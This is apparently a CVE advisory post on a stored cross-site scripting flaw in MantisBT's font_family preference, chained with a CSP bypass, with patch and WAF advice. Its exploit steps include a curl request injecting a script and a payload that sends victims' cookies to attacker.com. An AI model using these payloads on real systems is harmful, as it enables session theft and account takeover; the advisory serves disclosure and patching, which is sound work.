Listen to this Post
The vulnerability stems from improper handling of the `font_family` parameter during user preference updates. When an authenticated user modifies their account settings via account_prefs_update.php, the application retrieves the `font_family` value using the `gpc_get_string()` function. This value is then directly passed to `config_set()` without any form of validation, sanitization, or output encoding. The `font_family` preference is stored in the database and subsequently injected into HTML responses when MantisBT renders any page that displays user-specific settings. Because the stored value is not escaped, an attacker can supply arbitrary HTML or JavaScript as the `font_family` string. This payload is reflected in the victim’s browser each time any MantisBT page loads, leading to persistent Cross‑Site Scripting (XSS). The impact is elevated by a companion CSP‑bypass vulnerability (CVE‑2026‑40597). An attacker can upload a file with a MIME type that PHP `finfo` identifies as JavaScript. When the victim accesses the malicious file via file_download.php, the CSP `script-src` directive is circumvented, allowing the script to execute. In combination, an attacker can hijack session cookies, perform actions on behalf of the victim, and ultimately take over the account. The fix introduces whitelist validation: the `font_family` value is compared against helper_get_font_list(), and any invalid input triggers a client exception.
dailycve form:
Platform: MantisBT
Version: 2.11.0-2.28.1
Vulnerability : XSS
Severity: High
date: 2026-05-11
Prediction: Patch 2026-05-20
Analytics under heading What Undercode Say:
grep -r "gpc_get_string('font_family')" /path/to/mantisbt/
curl -X POST -d "font_family=<script>alert(1)</script>" "https://target.com/account_prefs_update.php"
Exploit:
1. Authenticate as any valid user.
2. Intercept the `POST /account_prefs_update.php` request.
- Replace the `font_family` parameter with a malicious payload (e.g.,
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>). - Send the request – the payload is stored without sanitization.
- The injected script executes on every MantisBT page viewed by the victim.
- Leverage CSP‑bypass (CVE‑2026‑40597) to host a JavaScript attachment and force its execution, achieving full account takeover.
Protection from this CVE
- Upgrade to MantisBT 2.28.2 or later.
- Alternatively, apply the official patch (commit 9e8409cdd979eba86ef532756fc47c1d8112d22d) that adds whitelist validation in
account_prefs_update.php. - If patching is not immediately possible, manually inspect and sanitize all `font_family` inputs via a WAF rule (e.g., reject any `font_family` containing `<` or
>).
Impact:
- Persistent Cross‑Site Scripting (XSS) allows an attacker to execute arbitrary JavaScript in the context of any authenticated user.
- Session hijacking, unauthorized actions (issue creation, comment modification, status changes), and credential theft.
- Full account takeover when combined with the CSP‑bypass vulnerability (CVE‑2026‑40597).
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

